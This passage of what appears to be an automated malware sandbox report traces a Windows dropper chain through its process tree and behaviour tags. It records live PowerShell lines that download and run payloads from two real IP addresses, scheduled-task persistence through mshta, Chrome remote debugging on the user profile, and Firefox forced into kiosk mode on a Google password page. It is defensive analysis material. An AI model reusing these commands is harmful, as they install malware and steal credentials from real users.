SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: SeDebugPrivilege 4624 powershell.exe Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: SeDebugPrivilege 3632 powershell.exe Token: SeDebugPrivilege 1352 powershell.exe Token: SeDebugPrivilege 1520 tasklist.exe Token: SeDebugPrivilege 1588 powershell.exe Token: SeDebugPrivilege 4160 tasklist.exe Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: SeDebugPrivilege 3480 tempdatalogger.exe Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: SeDebugPrivilege 2084 powershell.exe -
Suspicious use of FindShellTrayWindow 45 IoCs
pid Process 1660 J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe 1940 notepad.exe 2972 3277ecaa2a.exe 3432 Explorer.EXE 3432 Explorer.EXE 2972 3277ecaa2a.exe 2972 3277ecaa2a.exe 3432 Explorer.EXE 3432 Explorer.EXE 1840 8c305bd773.exe 3432 Explorer.EXE 3432 Explorer.EXE 1840 8c305bd773.exe 1840 8c305bd773.exe 1840 8c305bd773.exe 1840 8c305bd773.exe 1840 8c305bd773.exe 1840 8c305bd773.exe 1840 8c305bd773.exe 1840 8c305bd773.exe 1840 8c305bd773.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe 1840 8c305bd773.exe 3432 Explorer.EXE 3432 Explorer.EXE 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe -
Suspicious use of SendNotifyMessage 34 IoCs
pid Process 2972 3277ecaa2a.exe 2972 3277ecaa2a.exe 2972 3277ecaa2a.exe 1840 8c305bd773.exe 1840 8c305bd773.exe 1840 8c305bd773.exe 1840 8c305bd773.exe 1840 8c305bd773.exe 1840 8c305bd773.exe 1840 8c305bd773.exe 1840 8c305bd773.exe 1840 8c305bd773.exe 1840 8c305bd773.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe 1840 8c305bd773.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe 2256 firefox.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4360 cnntXtU.exe 2256 firefox.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3432 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1664 wrote to memory of 1660 1664 001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe 93 PID 1664 wrote to memory of 1660 1664 001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe 93 PID 1664 wrote to memory of 1660 1664 001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe 93 PID 1660 wrote to memory of 2668 1660 J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe 96 PID 1660 wrote to memory of 2668 1660 J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe 96 PID 1660 wrote to memory of 2668 1660 J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe 96 PID 2668 wrote to memory of 1620 2668 rapes.exe 97 PID 2668 wrote to memory of 1620 2668 rapes.exe 97 PID 1620 wrote to memory of 4476 1620 PcAIvJ0.exe 98 PID 1620 wrote to memory of 4476 1620 PcAIvJ0.exe 98 PID 4476 wrote to memory of 5036 4476 cmd.exe 100 PID 4476 wrote to memory of 5036 4476 cmd.exe 100 PID 5036 wrote to memory of 116 5036 powershell.exe 106 PID 5036 wrote to memory of 116 5036 powershell.exe 106 PID 116 wrote to memory of 972 116 powershell.exe 108 PID 116 wrote to memory of 972 116 powershell.exe 108 PID 972 wrote to memory of 5108 972 csc.exe 109 PID 972 wrote to memory of 5108 972 csc.exe 109 PID 116 wrote to memory of 3432 116 powershell.exe 56 PID 2668 wrote to memory of 2036 2668 rapes.exe 111 PID 2668 wrote to memory of 2036 2668 rapes.exe 111 PID 2036 wrote to memory of 4264 2036 ktxzLhN.exe 115 PID 2036 wrote to memory of 4264 2036 ktxzLhN.exe 115 PID 2668 wrote to memory of 5036 2668 rapes.exe 116 PID 2668 wrote to memory of 5036 2668 rapes.exe 116 PID 2668 wrote to memory of 5036 2668 rapes.exe 116 PID 5036 wrote to memory of 4924 5036 nhDLtPT.exe 118 PID 5036 wrote to memory of 4924 5036 nhDLtPT.exe 118 PID 5036 wrote to memory of 4924 5036 nhDLtPT.exe 118 PID 3432 wrote to memory of 1940 3432 Explorer.EXE 119 PID 3432 wrote to memory of 1940 3432 Explorer.EXE 119 PID 4924 wrote to memory of 2256 4924 Gxtuum.exe 120 PID 4924 wrote to memory of 2256 4924 Gxtuum.exe 120 PID 4924 wrote to memory of 2256 4924 Gxtuum.exe 120 PID 3432 wrote to memory of 1940 3432 Explorer.EXE 119 PID 3432 wrote to memory of 1940 3432 Explorer.EXE 119 PID 3432 wrote to memory of 1940 3432 Explorer.EXE 119 PID 3432 wrote to memory of 1940 3432 Explorer.EXE 119 PID 3432 wrote to memory of 1940 3432 Explorer.EXE 119 PID 3432 wrote to memory of 1940 3432 Explorer.EXE 119 PID 3432 wrote to memory of 1940 3432 Explorer.EXE 119 PID 3432 wrote to memory of 1940 3432 Explorer.EXE 119 PID 3432 wrote to memory of 1940 3432 Explorer.EXE 119 PID 3432 wrote to memory of 1940 3432 Explorer.EXE 119 PID 2668 wrote to memory of 3236 2668 rapes.exe 121 PID 2668 wrote to memory of 3236 2668 rapes.exe 121 PID 2668 wrote to memory of 3236 2668 rapes.exe 121 PID 3432 wrote to memory of 1940 3432 Explorer.EXE 119 PID 2668 wrote to memory of 4360 2668 rapes.exe 122 PID 2668 wrote to memory of 4360 2668 rapes.exe 122 PID 3432 wrote to memory of 1972 3432 Explorer.EXE 123 PID 3432 wrote to memory of 1972 3432 Explorer.EXE 123 PID 2668 wrote to memory of 2972 2668 rapes.exe 125 PID 2668 wrote to memory of 2972 2668 rapes.exe 125 PID 2668 wrote to memory of 2972 2668 rapes.exe 125 PID 2972 wrote to memory of 4228 2972 3277ecaa2a.exe 126 PID 2972 wrote to memory of 4228 2972 3277ecaa2a.exe 126 PID 2972 wrote to memory of 4228 2972 3277ecaa2a.exe 126 PID 2972 wrote to memory of 4836 2972 3277ecaa2a.exe 127 PID 2972 wrote to memory of 4836 2972 3277ecaa2a.exe 127 PID 2972 wrote to memory of 4836 2972 3277ecaa2a.exe 127 PID 4228 wrote to memory of 4640 4228 cmd.exe 129 PID 4228 wrote to memory of 4640 4228 cmd.exe 129 PID 4228 wrote to memory of 4640 4228 cmd.exe 129 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3432 -
C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe"C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe"C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1620 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5995.tmp\5996.tmp\5997.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"6⤵
- Suspicious use of WriteProcessMemory
PID:4476 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"8⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:116 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5muhcagw\5muhcagw.cmdline"9⤵
- Suspicious use of WriteProcessMemory
PID:972 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAB10.tmp" "c:\Users\Admin\AppData\Local\Temp\5muhcagw\CSCE2143F3F87124EFFBE7090E7EC1FD14.TMP"10⤵PID:5108
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe"C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Users\Admin\AppData\Local\Temp\dll32.exe"C:\Users\Admin\AppData\Local\Temp\dll32.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4264 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp3D4D.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp3D4D.tmp.bat7⤵PID:3680
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:3792
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 4264"8⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1520
-
-
C:\Windows\system32\find.exefind ":"8⤵PID:3652
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak8⤵
- Delays execution with timeout.exe
PID:4996
-
-
C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe"C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3480 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --headless --disable-gpu9⤵
- Uses browser remote debugging
PID:2632 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffa2898cc40,0x7ffa2898cc4c,0x7ffa2898cc5810⤵PID:3552
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1408,i,14568539947306955284,2076734954859821730,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1400 /prefetch:210⤵PID:3196
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --field-trial-handle=1372,i,14568539947306955284,2076734954859821730,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1644 /prefetch:310⤵PID:2204
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"6⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4924 -
C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe"C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2256
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe"C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3236
-
-
C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"5⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4360
-
-
C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe"C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn hBpNSma7kUh /tr "mshta C:\Users\Admin\AppData\Local\Temp\kAxSdUV2p.hta" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4228 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn hBpNSma7kUh /tr "mshta C:\Users\Admin\AppData\Local\Temp\kAxSdUV2p.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4640
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\kAxSdUV2p.hta6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4836 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4624 -
C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE"C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3884
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd" "5⤵
- System Location Discovery: System Language Discovery
PID:4804 -
C:\Windows\SysWOW64\timeout.exetimeout /t 26⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4876
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- System Location Discovery: System Language Discovery
PID:3532 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3632
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- System Location Discovery: System Language Discovery
PID:2552 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1352
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- System Location Discovery: System Language Discovery
PID:1036 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1588
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "R0yhcmahnHj" /tr "mshta \"C:\Temp\WK6TyvNYU.hta\"" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4020
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\WK6TyvNYU.hta"6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:2172 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2084 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4564
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe"C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4596 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:1036
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe"C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1584 -
C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe"C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1588
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 8126⤵
- Program crash
PID:1796
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe"C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4372 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:1456
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe"C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:916
-
-
C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe"C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3204 -
C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe"C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3768
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe"C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3780
-
-
C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe"C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1840 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4596
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4272
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:3872
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2924
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4928
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking6⤵PID:3372
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking7⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2256 -
